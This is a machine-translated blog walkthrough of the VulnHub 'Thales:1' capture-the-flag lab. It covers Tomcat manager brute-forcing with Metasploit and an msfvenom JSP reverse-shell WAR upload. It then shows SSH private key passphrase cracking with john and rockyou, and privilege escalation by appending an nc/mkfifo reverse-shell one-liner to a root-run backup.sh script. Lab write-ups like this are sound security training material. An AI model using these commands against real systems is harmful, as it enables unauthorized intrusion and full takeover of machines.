当前位置:网站首页>[vulnhub range] thales:1
[vulnhub range] thales:1
2022-07-07 16:24:00 【Nailaoyyds】
Catalog
3、 ... and 、 Elevated privileges
0x02 Dictionary explosion edit
Preface
describe
brief introduction : Open your eyes , Another angle
Include 2 A sign :user.txt and root.txt.
Download link
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00 Introduction to the environment kali 192.168.56.102 Thales Drone aircraft 192.168.56.101
One 、 information gathering
0x00 arp-scan scanning
arp-scan -I eth1 -l # Scan network card LAN
0x01 nmap scanning
Scan to two network segments Not sure which nmap Scan scan two IP
Open ports 22 and 8080
Visit Site , User name and password are required
Two 、 Exploit
0x00 msfconsole utilize
msf Search for tomcat login
To configure payload
user name tomcat password role1
Login successfully
0x01 Upload files
Look for function points , Found the upload point
utilize kali Generate war File Trojan do rebound shell msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
Upload successful , And run
3、 ... and 、 Elevated privileges
0x00 rebound shell
Listening port
Upgrade transaction mutual shell
sudo -l # Need a password , Unknown stay home User found under file Thales
stay `notes.txt` Found in the file `/usr/local/bin/backup.sh View file contents
0x02 Dictionary explosion
Find out .ssh Folder
It is found that the private key can be used ssh2john.py Generate password file explosion
use ssh2john.py Compile the script
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Burst out the code vodka06
Switching users
0x03 user.txt
see user.txt--- first flag
notes.txt yes root The powers of the , There may be something inside
0x04 rebound shell
notice backup.sh It has executive authority , Can write bounce shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
File content editing will directly replace , Append for selection
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
monitor 9999, After writing, you will connect by yourself
summary
Thales Learned
msf The use of blasting dictionary
rsa Use of private key ciphertext
边栏推荐
猜你喜欢
Strengthen real-time data management, and the British software helps the security construction of the medical insurance platform
Apache Doris刚“毕业”:为什么应关注这种SQL数据仓库?
Multiplication in pytorch: mul (), multiply (), matmul (), mm (), MV (), dot ()
统计学习方法——感知机
Odoo集成Plausible埋码监控平台
讲师征集令 | Apache SeaTunnel(Incubating) Meetup 分享嘉宾火热招募中!
You Yuxi, coming!
Unity3d click events added to 3D objects in the scene
Xcode Revoke certificate
Unity3D_ Class fishing project, bullet rebound effect is achieved
随机推荐
Markdown formula editing tutorial
Use moviepy Editor clips videos and intercepts video clips in batches
logback.xml配置不同级别日志,设置彩色输出
01tire+链式前向星+dfs+贪心练习题.1
Shipping companies' AI products are mature, standardized and applied on a large scale. CIMC, the global leader in port and shipping AI / container AI, has built a benchmark for international shipping
应用程序和matlab的通信方式
星瑞格数据库入围“2021年度福建省信息技术应用创新典型解决方案”
Dotween -- ease function
Continuous creation depends on it!
模仿企业微信会议室选择
The unity vector rotates at a point
2022山东智慧养老展,适老穿戴设备展,养老展,山东老博会
Lecturer solicitation order | Apache seatunnel (cultivating) meetup sharing guests are in hot Recruitment!
[hcsd celebrity live broadcast] teach the interview tips of big companies in person - brief notes
Excessive dependence on subsidies, difficult collection of key customers, and how strong is the potential to reach the dream of "the first share of domestic databases"?
过度依赖补助,大客户收款难,冲刺“国产数据库第一股”的达梦后劲有多足?
如何在shell中实现 backspace
What about the pointer in neural network C language
How to determine whether the checkbox in JS is selected
Odoo集成Plausible埋码监控平台